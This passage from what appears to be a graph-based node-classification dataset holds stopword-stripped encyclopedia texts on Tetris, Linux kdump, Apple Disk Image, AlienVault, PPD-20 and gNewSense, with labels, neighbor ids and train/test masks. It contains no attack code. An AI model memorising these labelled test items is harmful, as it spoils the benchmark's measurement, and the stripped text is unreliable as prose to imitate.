    "text": "Tetris:tetris tetris portmanteau tetromino tennis tile-matching puzzle video game originally designed programmed soviet russian game designer alexey leonidovich pajitnov first playable version completed june 6 1984 working dorodnitsyn computing centre academy science soviet union moscow derived name greek numerical prefix tetra- game pieces contain four segments tennis pajitnov favorite sport name also used in-game refer play four lines cleared tetris first entertainment software exported soviet union united states published spectrum holobyte commodore 64 ibm pc game popular use tetrominoes four-element case polyominoes used popular puzzles since least 1907 name figures given mathematician solomon w. golomb 1953 game one many variants available nearly every video game console computer operating system well devices graphing calculators mobile phones portable media players pdas network music players easter egg non-media products like oscilloscopes inspired tetris serving dishes even played sides various buildings versions tetris sold range 1980s home computer platforms well arcades successful handheld version game boy launched 1989 established game one popular video games ever electronic gaming monthly 100th issue tetris first place greatest game time 2007 came second place ign 100 greatest video games time 2019 moved 7th january 2010 announced games franchise sold 170 million copies—approximately 70 million physical copies 100 million copies cell phones—making second best selling paid-downloaded game time behind minecraft tetriminos game pieces shaped like tetrominoes geometric shapes composed four square blocks random sequence tetriminos fall playing field rectangular vertical shaft called well matrix objective game manipulate tetriminos moving one sideways and/or rotating quarter-turns form solid horizontal line without gaps line formed disappears blocks fall fill space certain number lines cleared game enters new level game progresses level causes tetriminos fall faster game ends stack tetriminos reaches top playing field new tetriminos able enter games also end finite number levels lines tetriminos fill clear singles doubles j l able clear triples tetrimino capacity clear four lines simultaneously referred tetris may vary depending rotation compensation rules specific tetris implementation instance super rotation system used recent implementations certain situations allow z 'snap tight spots clear triples pajitnov original version electronika 60 computer used green brackets represent blocks versions tetris original game boy/game boy color dedicated handheld games use monochrome grayscale graphics popular versions use separate color distinct shape prior tetris company standardization early 2000s colors varied widely implementation implementation scoring formula majority tetris products built idea difficult line clears awarded points example single line clear tetris zone worth 100 points clearing four lines known tetris worth 800 subsequent back-to-back tetris worth 1,200 conjunction players awarded combos exist certain games reward multiple line clears quick succession exact conditions triggering combos amount importance assigned vary game game nearly tetris games allow player press button increase speed current piece descent cause piece drop lock place immediately known soft drop hard drop respectively performing soft drop player also stop piece increased speed releasing button piece settles place games allow either soft drop hard drop others separate buttons many games award number points based height piece fell locking using hard drop generally awards points although first tetris game feature new kind tetris easy spin see next tetris also called infinite spin critics tetris worlds first game fall major criticisms easy spin refers property tetrimino stop falling moment left right movement rotation effectively allowing someone suspend tetrimino thinking place feature implemented tetris company official guideline type play differs traditional tetris takes away pressure higher level speed reviewers went far say mechanism broke game goal tetris worlds however complete certain number lines fast possible ability hold piece placement make achieving goal faster later gamespot received easy spin openly saying infinite spin issue honestly really affects single-player gameplay modes tetris ds competitive mode requires lay pieces quickly humanly possible response issue henk rogers stated interview infinite spin intentional part game design allowing novice players expend available scoring time decide best placement piece rogers observed gratuitous spinning occur competitive play expert players require much time think piece placed limitation placed infinite lock delay later games franchise certain amount inputs i.e rotations movements piece instantly lock defaulted 15 inputs tetris created june 1984 alexey pajitnov artificial intelligence researcher working soviet academy sciences computer center moscow tasked testing capabilities new hardware pajitnov would writing simple games initially considered creating game around pentominoes featured puzzle games enjoyed child felt might complicated twelve different shape variations concept switched tetrominoes seven variants electronika 60 working text-based display tetrominoes formed letter characters realizing completed lines resulted screen filling quickly pajitnov decided delete creating key part tetris gameplay pajitnov game proved popular colleagues academy sciences co-workers dmitry pavlovsky vadim gerasimov ported game ibm pc gerasimov reports pajitnov chose name tetris combination 'tetromino 'tennis pc game became popular began spreading around moscow gerasimov removed 1988 version game website october 2003 response demand counsel tetris company resumed making available august 2006 pc version made way budapest hungary ported various platforms discovered british software house andromeda attempted contact pajitnov secure rights pc version deal firmly settled already sold rights spectrum holobyte failing settle deal pajitnov andromeda attempted license hungarian programmers instead meanwhile legal rights settled spectrum holobyte ibm pc version tetris contained background graphics featuring russian scenes released united states 1987 game popularity tremendous computer gaming world called game deceptively simple insidiously addictive details licensing issues uncertain point 1987 andromeda managed obtain copyright licensing ibm pc home computer system commodore 64 release 1988 26-minute soundtrack composed game musician wally beben amiga atari st two different versions mirrorsoft 1987 spectrum holobyte 1988 became available mirrorsoft version feature background graphics spectrum holobyte version similar pc version contained similar images also distributed infogrames regions games sold budget titles due game simplicity spectrum apple ii package contained three diskettes three different versions game apple ii+ apple iie separate dos 3.3 prodos diskettes apple iigs diskette none copy-protected included documentation specifically charged purchaser honor give away copy extra diskettes unsure publish game fearful response soviet regime pajitnov took opportunity offered perestroika gave rights soviet government ten years 1988 soviet government began market rights tetris following promotional trip country gerald hicks one-time united states champion game organization called elektronorgtechnica elorg short time elorg still paid andromeda andromeda licensing sub-licensing rights game different version tetris originally released late 1988 bullet-proof software bps several japanese home computers well msx family computer japan predating nintendo version unlicensed arcade version released south korea well unlicensed master system titled super tetris 슈퍼 테트리스 syupeo teteuriseu 1989 half dozen different companies claimed rights create distribute tetris software home computers game consoles handheld systems elorg meanwhile held none companies legally entitled produce arcade version signed rights atari games signed non-japanese console handheld rights nintendo tetris show january 1988 consumer electronics show las vegas picked dutch games publisher henk rogers based japan eventually led agreement brokered nintendo saw tetris bundled every game boy rogers later stated tetris made game boy game boy made tetris tengen console software division atari games regardless applied copyright tetris game nintendo entertainment system loosely based arcade version proceeded market distribute name tetяis soviet mind game faux cyrillic typography incorporating cyrillic letter ya disregarding nintendo license elorg nintendo contacted atari games claiming stolen rights tetris whereupon atari games sued believing rights four weeks shelf courts ruled nintendo company rights tetris home game systems tengen tetяis recalled unknown number copies sold lawsuits tengen nintendo nes version carried 1993 tengen version tetяis considered rare nintendo released version tetris nintendo entertainment system nes developed gunpei yokoi nes version sold 8 million copies worldwide nintendo nes version lacked side-by-side 2-player option featured tengen version nintendo power reviewed version november december 1989 edition classic tetris world championship commenced 2010 uses nintendo version tetris nintendo released game super nintendo entertainment system snes along dr mario new version used different colors older versions makes squares look connected version similar version released nes february 13 2019 nintendo announced released new version classic game called tetris 99 tetris 99 features battle royale-style game mode 99 players play match addition complying tetris guideline version game features unique mechanic known badges badges lessen severity attacks received amplifies attacks sent players gain badges knocking others tetris 99 available nintendo switch 1988 arcade version released sega japan sega system 16 system e arcade boards japanese gamest award game year following year version sega mega drive originally planned release japan pulled following licensing issues resulting less ten copies printed new port arcade version m2 unrelated rare mega drive version included sega genesis mini microconsole scheduled release september 2019 sega arcade version commercially successful japanese arcades famicom tsūshin arcade earnings chart number-three august 1989 september 1989 rose number two october 1989 overtaking namco racing video game winning run 2014 conjunction 30th anniversary series sega released puyo puyo tetris multi-platform game blends gameplay elements tetris puyo puyo franchises 1996 rights game reverted russian state pajitnov previously made little money game year tetris company founded claiming hold copyright registrations tetris products u.s. taking trademark registrations tetris almost every country world licensed brand number companies u.s. court international trade u.s. customs times issued seizure orders preclude unlicensed tetris -like games imported u.s. though bulletins circulated u.s copyright office state copyright apply rules game late 1997 mid-2006 ttc legal counsel sent cease desist letters web sites basis tetris -type games infringing tetris trademark trade dress and/or look feel copyright around 2009 ttc tetris holding llc brought legal action biosocia inc. grounds biosocia blockles game infringed proprietary rights held ttc tetris holding llc september 10 2009 legal case biosocia resolved biosocia agreeing discontinue making blockles game available public may 2010 ttc legal counsel sent cease desist letters google insisting 35 tetris clones removed android market us district court judge ruled june 2012 tetris clone mino xio interactive infringed tetris company copyrights replicating elements playfield dimensions shapes blocks addition ruled tetris holding llc trade dress infringed mino replicated form brightly colored style tetris tetriminos higher-than-wide rectangular tetris playfield based success tetris 99 tetris company n3twork developing tetris royale ios android version tetris include battle royale mode 100 players along solo multiplayer modes expected release 2019 tetris subject many changes throughout releases since 1980s newer tetris games emphasized pace rather endurance older releases game boy nes tetris offer records according points since meter points restricted specific number digits games records maxed experienced player next big game boy release tetris tetris dx marathon mode—comparable mode previous releases—allowed additional digit point meter even players still maxed 9,999,999 points hours play new tetris world record competitors spent 12 hours playing game tetris dx new tetris new modes sprint ultra added modes require player act timer either gain lines points time releases like tetris worlds removed point records particular game kept records fast certain number lines could cleared depending level critics tetris worlds said flawed virtue ability piece hover bottom long player needs many different modes play added recent years modes appearing one major release include classic marathon game sprint otherwise game b 40 lines ultra square cascade field dimension tetris perhaps least deviated among releases almost always 10 cells wide 20 high releases handheld platforms small screens smaller fields example tetris jr. keychain game 8 12 tetris game boy 10 18 traditionally blocks spawn within four central columns two highest rows tetrimino occupies columns 4 5 6 7 tetrimino occupies columns 5 6 remaining 5 tetriminos occupy columns 4 5 6 especially older versions 5 6 7 recent games pieces spawn visible playfield traditional games level-up would occur every ten lines cleared newer games tetris worlds number lines required varies upon new level level-up points awarded increased blocks fall slightly faster example nes tetris operates 60 frames per second level 0 piece falls one step every 48 frames level 19 piece falls one step every 2 frames level increments either terminate certain point game boy tetris tops level 20 increase forever yet speed certain point nes tetris level speed level 29 due limitations game engine pieces capable dropping faster tool-assisted emulation show level indicator increases indefinitely—eventually leading glitch meter displays non-numeric characters modern games tetris grand master tetris worlds highest levels opt drop piece one row per frame pieces appear reach bottom soon spawn result games delay lets player slide piece bottom moment help deal otherwise unplayable fall speed games hover time regenerated piece moved rotated soft drops first implemented nintendo releases tetris pieces would able drop faster locking slide gaps option hard dropping originated early pc games microsoft tetris game developed dave edson bundled microsoft entertainment pack hard dropping piece falls locks one frame newer tetris games feature options games locking roles reversed soft dropping making pieces drop faster locking hard dropping making pieces drop instantly lock single direction rotation older restriction since ruled nearly every new official release favor separate buttons clockwise one counter clockwise rotation traditional games unsymmetrical vertical orientation i- z- s-pieces fill columns clockwise counter clockwise rotation games vary allowing two possible column orientations one counter clockwise one clockwise rotations double rotation—only seen progressive clones quadra dtet —rotates piece 180° one features appreciated skilled players wall kick ability rotate pieces even touch left right walls nes version example z piece vertically aligned falling touching left wall player rotate piece giving impression rotate buttons locked situation player move piece one position right rotating losing precious time proper implementations wall kick first appeared arcade version tetris atari games piece preview allows look next piece enter field feature implemented since earliest games though early games preview turned made score increase slowly several tetris variants exist feature alternate rules pieces feature alternate topologies dimensions others completely different gameplay popular variant called grand master eventually becomes fast players use every second time optimally even mode dubbed invisible tetris blocks shown falling – revealed game popularity relatively simple code required produce game game nearly rules tetris often used hello world project programmers coding new system programming language resulted availability large number ports different platforms instance µtorrent gnu emacs contain similar shape-stacking games easter eggs players lose typical game tetris longer keep increasing speed player find appropriate solution tetriminos 've given tetriminos stack top playing field commonly referred topping question would possible play forever first considered thesis john brzustowski 1992 conclusion reached game statistically doomed end reason z tetriminos player receives sufficiently large sequence alternating z tetriminos naïve gravity used standard game eventually forces player leave holes board holes necessarily stack top ultimately end game pieces distributed randomly sequence eventually occur thus game example ideal uniform uncorrelated random number generator played long enough player top practice occur tetris variants variants allow player choose play z tetriminos good player may survive well 150 consecutive tetriminos way implementation ideal uniform randomizer probability given time next 150 tetriminos z approximately implementations use pseudorandom number generator generate sequence tetriminos s–z sequence almost certainly contained sequence produced 32-bit linear congruential generator many implementations roughly states evil algorithm bastet unofficial variant often starts game series seven z pieces modern versions tetris released 2001 use bag-style randomizer guarantees players never receive four z pieces row one indispensable rules enforced tetris guideline officially licensed tetris games must follow recent versions tetris tetris worlds allow player repeatedly rotate block hits bottom playfield without locking place see easy spin dispute permits player play infinite amount time though necessarily land infinite number blocks computer science common analyze computational complexity problems including real life problems games proven offline version tetris player knows complete sequence pieces dropped i.e hidden information following objectives np-complete also difficult even approximately solve first second fourth problem np-hard given initial gameboard sequence p pieces approximate first two problems within factor constant np-hard approximate last problem within factor constant prove np-completeness shown polynomial reduction 3-partition problem also np-complete tetris problem atari arcade version tetris nes port subsidiary tengen original pieces composed brad fuller well traditional russian tunes also arranged fuller according research dr. richard haier et al prolonged tetris activity also lead efficient brain activity play first playing tetris brain function activity increases along greater cerebral energy consumption measured glucose metabolic rate tetris players become proficient brains show reduced consumption glucose indicating efficient brain activity task moderate play tetris half-an-hour day three months boosts general cognitive functions critical thinking reasoning language processing increases cerebral cortex thickness january 2009 oxford university research group headed dr. emily holmes reported plos one healthy volunteers playing tetris soon viewing traumatic material laboratory reduced number flashbacks scenes following week believe computer game may disrupt memories retained sights sounds witnessed time later re-experienced involuntary distressing flashbacks moment group hopes develop approach potential intervention reduce flashbacks experienced post-traumatic stress disorder emphasized preliminary results professor jackie andrade jon may plymouth university cognition institute ph.d. student jessica skorka-brown conducted research shows playing tetris could give quick manageable fix people struggling stick diets quit smoking drinking another notable effect according canadian study april 2013 playing tetris found treat older adolescents amblyopia lazy eye better patching victim well eye train weaker eye dr. robert hess research team said much better patching – much enjoyable faster seems work better. tested united kingdom experiment also appears help children problem game noted cause brain involuntarily picture tetris combinations even player playing tetris effect although occur computer game situation showcasing repeated images scenarios jigsaw puzzle debates tetris cognitive benefits continue least researchers view milestone gamification education 2013 tetris company signed contract hasbro make bop jenga themed version tetris games shown new york toy fair bop tetris sold amazon.com june 2013 jenga tetris like jenga using tetris shapes bop tetris audio game several game modes including marathon pass marathon mode player four lives complete puzzles square lights game unit three actions slam slams top part device slide screen rotate left right spin device spin player fails complete puzzle voice buddy rubino make santa claus type laugh encourage player comment squares man 're squares shapes hard buddy say life lost one four squares top screen disappear every stage completed buddy tell player comment level 45-second bonus round player score two bonus points pass mode marathon mode except buddy rubino say pass let people join compute called ibm version tetris one addictive computer games side berlin wall ... game start work appointment keep consider warned orson scott card joked game proves russia still wants bury us shudder think blow economy computer productivity drops 0 noting tetris copy-protected wrote obviously game meant find way onto every american machine ibm version game reviewed 1988 dragon 135 hartley patricia kirk lesser role computers column reviewers gave game 4.5 5 stars lessers later reviewed spectrum holobyte macintosh version tetris 1989 dragon 141 giving version 5 5 stars 1993 zx spectrum version game voted number 49 sinclair official top 100 games time 1996 tetris pro ranked 38th best game time amiga power entertainment weekly picked game 8 greatest game available 1991 saying thanks nintendo ’ endless promotion tetris become one popular video games computer gaming world gave tetris 1989 compute choice award arcade game describing far addictive game ever game three software publishers association excellence software awards 1989 including best entertainment program critic choice award consumers computer gaming world 1996 ranked 14th magazine list innovative computer games year next generation listed number 2 top 100 games time commenting something perfect zen falling blocks tetris game captured interest everyone ever played march 12 2007 new york times reported tetris named list ten important video games time so-called game canon announced 2007 game developers conference library congress took video game preservation proposal began 10 games including tetris 2007 video game website gamefaqs hosted sixth annual character battle users nominate favorite video game characters popularity contest characters participate l-shaped tetris piece l-block called entered contest joke character november 4 2007 contest june 6 2009 google honored tetris 25-year anniversary changing logotype version drawn tetris blocks – l letter long tetris block lowering place seen 2009 game informer put tetris 3rd list top 200 games time saying game could considered ageless tetris game informer staff also placed third 2001 list 100 best games ever electronic gaming monthly 100th issue tetris first place greatest game time 2007 tetris came second place ign 100 greatest video games time january 2010 announced tetris franchise sold 170 million copies approximately 70 million physical copies 100 million copies cell phones making best-selling paid-downloaded game time 1991 pc format named tetris one 50 best computer games ever editors called incredibly addictive one best games time guinness world records recognized game ported history video gaming appearing excess 65 different platforms 2011 tetris subject academic research vladimir pokhilko first clinical psychologist conduct experiments using tetris subsequently used research several fields including theory computation algorithmic theory cognitive psychology game tetris blocks appear adsorb onto lower surface window led scientists use tetrominoes proxy molecules complex shape model adsorption flat surface study thermodynamics nanoparticles threshold entertainment teamed tetris company develop film adaptation tetris threshold ceo describes film epic sci-fi adventure film says story big 'll part trilogy 2016 sources reported press release claiming film would shot china 2017 80 million budget however 2017 later sources confirm film ever actually went production tetris appeared 2010 short animated film pixels 2015 movie pixels inspired former",
    "neighbors": [
      9735,
      2469,
      9006,
      7983,
      9262,
      10931,
      4152,
      9917,
      8767,
      8774,
      9166,
      4305,
      11477,
      986,
      3675,
      7772,
      6109,
      11228,
      481,
      3300,
      6378,
      5995,
      7916,
      1773
    ],
    "mask": "Test"
  },
  {
    "node_id": 10856,
    "label": 2,
    "text": "Kdump_(Linux):kdump linux kdump feature linux kernel creates crash dumps event kernel crash triggered kdump exports memory image also known vmcore analyzed purposes debugging determining cause crash dumped image main memory exported executable linkable format elf object accessed either directly handling kernel crash automatically saved locally accessible file system raw device remote system accessible network event kernel crash kdump preserves system consistency booting another linux kernel known dump-capture kernel using export save memory dump result system boots clean reliable environment instead relying already crashed kernel may cause various issues causing file system corruption writing memory dump file implement dual kernel layout kdump uses kexec booting dump-capture kernel immediately kernel crash using kexec ability boot currently running kernel avoiding execution bootloader hardware initialization performed system firmware bios uefi dump-capture kernel either separate linux kernel image built specifically purpose primary kernel image reused architectures support relocatable kernels contents main memory ram preserved booting running dump-capture kernel reserving small amount ram advance dump-capture kernel preloaded none ram used primary kernel overwritten kernel crash handled reserved amount ram used solely dump-capture kernel otherwise unused normal system operation architectures including x86 ppc64 require small fixed-position portion ram boot kernel regardless loaded case kexec creates copy portion ram also accessible dump-capture kernel size optional position reserved portion ram specified kernel boot parameter command-line utility used primary kernel boots preload dump-capture kernel image associated initrd image reserved portion ram addition functionality part linux kernel additional userspace utilities support kdump mechanism including utility mentioned besides official utilities provided patch kexec suite userspace utilities linux distributions provide additional utilities simplify configuration kdump operation including setup automated saving memory dump files created memory dump files analyzed using gnu debugger using red hat dedicated utility kdump functionality together kexec merged linux kernel mainline kernel version 2.6.13 released august 29 2005",
    "neighbors": [
      4616,
      3082,
      5139,
      6675,
      7187,
      10776,
      25,
      10780,
      4637,
      10785,
      9762,
      6180,
      5158,
      7217,
      8242,
      9266,
      9784,
      10809,
      576,
      4161,
      8772,
      6213,
      8268,
      589,
      593,
      10333,
      97,
      6244,
      5222,
      8298,
      4207,
      7285,
      9335,
      2168,
      1147,
      5244,
      3197,
      4734,
      1150,
      11391,
      2179,
      7812,
      10883,
      6797,
      4238,
      7821,
      10382,
      2195,
      8852,
      9366,
      2711,
      6296,
      6808,
      9882,
      7325,
      1694,
      9887,
      2723,
      8364,
      3248,
      6837,
      10933,
      5815,
      5822,
      5824,
      8388,
      1736,
      2762,
      9932,
      8909,
      5840,
      6352,
      7382,
      8410,
      10971,
      4831,
      8928,
      1761,
      1253,
      2278,
      233,
      7403,
      9455,
      10482,
      5363,
      2294,
      8439,
      2809,
      2811,
      3323,
      10499,
      4360,
      1291,
      1804,
      4367,
      273,
      11539,
      792,
      10016,
      295,
      2345,
      7983,
      823,
      6968,
      4409,
      7992,
      7483,
      318,
      11075,
      3911,
      4423,
      6988,
      10063,
      5457,
      11601,
      5975,
      11095,
      10590,
      8551,
      10091,
      5492,
      7540,
      8573,
      1406,
      1922,
      8066,
      900,
      394,
      3978,
      5514,
      4493,
      7057,
      11667,
      9621,
      1431,
      8602,
      8092,
      11678,
      7584,
      1444,
      421,
      1445,
      935,
      9637,
      4521,
      4011,
      1456,
      11184,
      1972,
      6075,
      6078,
      9151,
      9667,
      8136,
      457,
      2529,
      6625,
      8676,
      2021,
      1513,
      1515,
      3055,
      6128,
      5105,
      499,
      2036,
      5619,
      5620,
      8186,
      10235,
      2044
    ],
    "mask": "None"
  },
  {
    "node_id": 10857,
    "label": 2,
    "text": "Apple_Disk_Image:apple disk image apple disk image disk image format commonly used macos operating system opened apple disk image mounted volume within macintosh finder apple disk image structured according one several proprietary disk image formats including universal disk image format udif new disk image format ndif apple disk image file name usually .dmg extension apple disk image files published mime type application/x-apple-diskimage different file systems contained inside disk images also support creating hybrid optical media images contain multiple file systems file systems supported include hierarchical file system hfs hfs plus file allocation table fat iso9660 universal disk format udf apple disk images created using utilities bundled mac os x specifically disk copy mac os x v10.2 earlier disk utility mac os x v10.3 later utilities also use apple disk image files images burning cds dvds disk image files may also managed via command line interface using hdiutil utility mac os x v10.2.3 apple introduced compressed disk images internet-enabled disk images use apple utility disk copy later integrated disk utility 10.3 disk copy application ability display multi-lingual software license agreement mounting disk image image mounted unless user indicates agreement license apple disk image allows secure password protection well file compression hence serves security file distribution functions disk image commonly used distribute software internet apple originally created disk image formats resource fork used mac applications could easily transferred mixed networks make internet even use resource forks declined mac os x disk images remained standard software distribution format disk images allow distributor control finder presentation window commonly used instruct user copy application correct folder previous version format intended floppy disk images usually referred disk copy 4.2 format version disk copy utility used handle images similar format supported compression floppy disk images called dart new disk image format ndif previous default disk image format mac os 9 disk images format generally .img confused raw .img disk image files .smi file extension files .smi extension actually applications mount embedded disk image thus self mounting image intended mac os 9 earlier universal disk image format udif native disk image format mac os x disk images format typically .dmg extension apple released documentation format attempts reverse engineer parts format successful encrypted layer reverse engineered implementation called vilefault spoonerism filevault apple disk image files essentially raw disk images i.e contain block data added metadata optionally one two layers applied provide compression encryption hdiutil layers called cudifencoding cencryptedencoding udif supports adc old proprietary compression format apple zlib bzip2 mac os x v10.4 lzfse mac os x v10.11 compression internally trailer described using following c structure values big-endian powerpc byte ordering explanation options available extract files mount proprietary apple disk image format cross-platform conversion utilities windows dmg images opened using several programs ultraiso isobuster macdrive also mount simple dmg files drives windows sparse disk encrypted dmgs free apple dmg disk image viewer also exists linux possibly unix flavors .dmg files burned cd/dvd using cd-burner program using cdrecord directly front-end k3b brasero directly mounted mountpoint e.g darling-dmg fuse module enabling easy dmg file mounting linux",
    "neighbors": [
      11137,
      9988,
      8582,
      4615,
      9874,
      1940,
      3222,
      9762,
      5413,
      3114,
      811,
      5677,
      6062,
      2095,
      11568,
      3889,
      8114,
      4406,
      823,
      10817,
      2755,
      11076,
      3659,
      7244,
      10317,
      4174,
      3921,
      722,
      4561,
      7379,
      2389,
      7254,
      3804,
      3167,
      9953,
      5096,
      10857,
      8940,
      237,
      4845,
      10476,
      6908,
      2045,
      7422,
      10623
    ],
    "mask": "Test"
  },
  {
    "node_id": 10858,
    "label": 4,
    "text": "AT&T_Cybersecurity:amp cybersecurity cybersecurity developer commercial open source solutions manage cyber attacks including open threat exchange world largest crowd-sourced computer-security platform july 2017 platform 65,000 participants contributed 14 million threat indicators daily company raised 116 million since founded 2007 july 10 2018 acquired communications becoming wholly owned subsidiary transaction completed august 22 2018 february 2019 alienvault renamed cybersecurity ossim project began 2003 started dominique karg julio casal ignacio cabrera alberto román became basis alienvault founded 2007 madrid spain company hired management team hewlett packard fortify group 2012 including alienvault ceo barmak meftah cto roger thornton five others 2015 company partnered intel coordinate real-time threat information similar deal hewlett packard announced year 2015 alienvault researchers released study disclosing chinese hackers circumventing popular privacy tools june 2015 alienvault chief scientist jaime blasco released report saying chinese hackers found way circumvent virtual private networks vpns tor anonymity software hides computer ’ location routing requests series internet service providers alienvault open threat exchange 26,000 participants 140 countries reporting one million potential threats daily june 2015 february 2017 alienvault released usm anywhere saas security monitoring platform designed centralize threat detection incident response compliance management cloud hybrid cloud on-premises environments cloud-based console july 2017 alienvault open threat exchange platform 65,000 participants contributed 14 million threat indicators daily july 10 2018 announced acquire alienvault undisclosed amount acquisition completed august 22 2018 company became subsidiary communications unit february 26 2019 alienvault renamed cybersecurity addition free products cybersecurity offers paid security platform called unified security management integrates threat detection incident response compliance management one solution threat applications offered via hardware virtual machines cloud service open threat exchange otx free enables security experts research collaborate new threats better compare data integrate threat information security systems big data platform otx leverages natural language processing machine learning cybersecurity also runs open source security information management ossim project helps network administrators computer security intrusion detection response august 2015 firm raised 52 million expand security business round led institutional venture partners included ggv capital kleiner perkins trident capital jackson square ventures company said 2015 adding 300 400 new clients quarter hired chief financial officer help prepare possible initial public offering ipo end fiscal year 2016 alienvault recorded 53 percent year-over-year sales growth increased install base 65 percent approximately 5,000 commercial customers alienvault raised 116 million since founded 2007 2017 alienvault best cloud computing security solution emea presented sc magazine uk year forbes featured alienvault forbes cloud 100 list deloitte featured alienvault deloitte technology fast 500 list 2015 2016 2015 alienvault advanced persistent threat apt solution year presented computing security awards 2014 alienvault nominated “ best smb security product ” jaime blasco director alienvault labs nominated “ technology hero year ” v3 technology industry publication alienvault competes siem network security industry hp arcsight ibm qradar logrhythm among others",
    "neighbors": [
      4194,
      8580,
      3497,
      939,
      5749,
      1111,
      9048,
      2558,
      5495
    ],
    "mask": "Test"
  },
  {
    "node_id": 10859,
    "label": 4,
    "text": "Presidential_Policy_Directive_20:presidential policy directive 20 presidential policy directive 20 ppd-20 provides framework u.s. cybersecurity establishing principles processes signed president barack obama october 2012 directive supersedes national security presidential directive nspd-38 integrating cyber tools national security directive complements nspd-54/homeland security presidential directive hspd-23 classified unreleased national security agency nsa nspd-54 authorized george w. bush gives u.s. government power conduct surveillance monitoring existence made public june 2013 former intelligence nsa infrastructure analyst edward snowden private industry issues surrounding international domestic law public-private-partnership became cornerstone america cybersecurity strategy suggestions private sector detailed declassified 2003 national strategy secure cyberspace companion document national security presidential directive nspd-38 signed secret george w. bush following year although contents nspd 38 still undisclosed u.s. military recognize cyberspace theater operations u.s. national defense strategy 2005 report declared ability operate global commons-space international waters airspace cyberspace important ... project power anywhere world secure bases operation three years later george w. bush formed classified comprehensive national cybersecurity initiative cnci citing economic national security obama administration prioritized cybersecurity upon taking office in-depth review communications information infrastructure cnci partially declassified expanded president obama outlines key elements broader updated national u.s. cybersecurity strategy 2011 pentagon announced capability run cyber attacks u.s. senate failed pass cybersecurity act 2012 august presidential policy directive 20 ppd-20 signed secret electronic privacy information center epic filed freedom information request see nsa would comply details reported november 2012 washington post wrote ppd-20 extensive white house effort date wrestle constitutes 'offensive 'defensive action rapidly evolving world cyberwar cyberterrorism following january obama administration released ten-point factsheet june 7 2013 ppd-20 became public released edward snowden posted guardian part 2013 mass surveillance disclosures u.s. factsheet claims ppd-20 acts within law consistent values promote domestically internationally previously articulated international strategy cyberspace n't reveal cyber operations directive snowden disclosure called attention passages noting cyberwarfare policy possible consequences directive calls defensive offensive measures defensive cyber effects operations dceo offensive cyber effects operations oceo respectively",
    "neighbors": [
      3495,
      11561,
      7887,
      9426,
      7893
    ],
    "mask": "Test"
  },
  {
    "node_id": 10860,
    "label": 2,
    "text": "GNewSense:gnewsense gnewsense linux distribution based debian developed sponsorship free software foundation goal user-friendliness proprietary e.g binary blobs non-free software removed free software foundation considers gnewsense composed entirely free software gnewsense takes relatively strict stance proprietary software example documentation gives instructions installing proprietary software excluded project launched brian brazil paul o'malley 2006. gnewsense originally based ubuntu since 1.0 release free software foundation assists gnewsense releases two years 8 august 2011 distrowatch classified gnewsense dormant september 2012 distrowatch changed status active 6 august 2013 first version directly based debian gnewsense 3 parkes released discussions trisquel forums gnewsense said inactive gnewsense activities 2017 default gnewsense uses gnome graphical user interface customized user choice x display manager window managers desktop environments available install hosted repositories ubiquity installer allows installing hard disk within live cd environment without need restarting computer prior installation besides standard system tools small applications gnewsense comes installed following software libreoffice productivity suite gnome web internet browser empathy instant messenger gimp editing photos raster graphics common software development tools including gcc installed default live cd used run operating system install onto disk cd images available download gnewsense made four major releases 2016 gnewsense announced next version gnewsense would 5.0 non-free software repositories provided gnewsense project non-free documentation artwork removed based ubuntu universe package repository enabled default order avoid trademark problems stem modification mozilla firefox gnewsense 1.1 rebranded burningdog burningdog likewise offer install non-free plugins various web media adobe flash gnewsense 2.0 abandoned burningdog adopted epiphany web browser later renamed simply web component gnome default browser application came recommendations instructions optionally compile run gnu icecat gnewsense 3.0 retains web default browser also comes modified version debian iceweasel offer access proprietary add-ons debian another linux distribution known strict licensing requirements adherence free software principles debian gnewsense rigorously exclude non-free software binary blobs official releases debian maintains hosts unofficial repositories non-free software firmware binaries debian free software sometimes depends upon suggests optional installation proprietary software theory users informed discretion use software paramount expressed clause 5 debian social contract though debian democratic project management seen stance become source recurrent controversy gnewsense contrast provide packages depend suggest use non-free software firmware extensions plugins gnewsense project provide convenience-access proprietary software reason seeing abrogation commitment development free software solutions similar debian gnewsense policies allow including documentation licensed gnu free documentation license invariant sections includes many manuals documentation released gnu project gnewsense initially forked ubuntu originally fork debian result founding developer paul o'malley prior work ubuntu gnewsense 3.0 distribution tracked debian base software distribution part debian project carefully disaggregate free software official distribution proprietary software provides courtesy access indeed many packages including debian-particular packages iceweasel icedove ported gnewsense simply modified way longer provide courtesy access non-free software options since gnewsense repositories contain free software support hardware requires firmware free firmware exists wireless network cards available may 1 2008 3d graphics application support also removed licensing issues mesa 3d january 13 2009 issues resolved 3d support became standard starting 2.2 release reviewing gnewsense 3.0 august 2013 jesse smith distrowatch noted many applications provided including openoffice.org 3 debian de-blobbed 2.6.32 linux kernel based linux-libre tools iceweasel 3.5 gnome 2.30 quite date smith concluded review following words generally speaking happy gnewsense 3.0 based debian distribution counted provide stability amazing performance distribution lean fast uncluttered flip side gnewsense system installer default package management tools geared toward experienced users probably provide steep learning curve novice linux users much automated minimum hand holding main feature gnewsense lack proprietary software also double-edged blade one hand means entire operating system audited modified redistributed great perspective software freedom fact distribution play multimedia formats handled flash content fairly well testament power free open source software one problem ran gnewsense software policy regards wireless network card distributions ship non-free intel firmware gnewsense n't include means distribution n't good fit laptop hand great match desktop system richard stallman founder president free software foundation said used gnewsense january 2010 still using april 2014 since stallman switched trisquel serdar yegulalp reviewed gnewsense infoworld said post network world gnewsense 3.1 february 2014 bryan lunduke reviewed linux distribution following words",
    "neighbors": [
      4611,
      3079,
      9736,
      3089,
      4113,
      8209,
      10257,
      8727,
      9757,
      543,
      11297,
      3618,
      7204,
      9253,
      11305,
      56,
      3129,
      4153,
      59,
      8248,
      9276,
      3649,
      4673,
      9281,
      3654,
      5190,
      3147,
      2125,
      1107,
      1110,
      6231,
      89,
      5721,
      4192,
      3685,
      5742,
      2671,
      4728,
      9851,
      11388,
      637,
      1150,
      1664,
      2692,
      8837,
      6791,
      9353,
      9873,
      11410,
      8857,
      10394,
      11418,
      6301,
      10397,
      5279,
      673,
      3745,
      1700,
      7332,
      7845,
      10920,
      9899,
      3245,
      7854,
      9902,
      1713,
      2738,
      7861,
      4790,
      4279,
      10425,
      2239,
      9407,
      2763,
      8907,
      3791,
      6352,
      7889,
      7385,
      11481,
      6371,
      4841,
      6890,
      7913,
      6380,
      7920,
      6898,
      5363,
      9461,
      1782,
      8438,
      5369,
      6393,
      8443,
      8957,
      7938,
      4355,
      7435,
      1295,
      7951,
      2321,
      2836,
      5397,
      6934,
      4887,
      10006,
      8476,
      8992,
      10016,
      10530,
      6436,
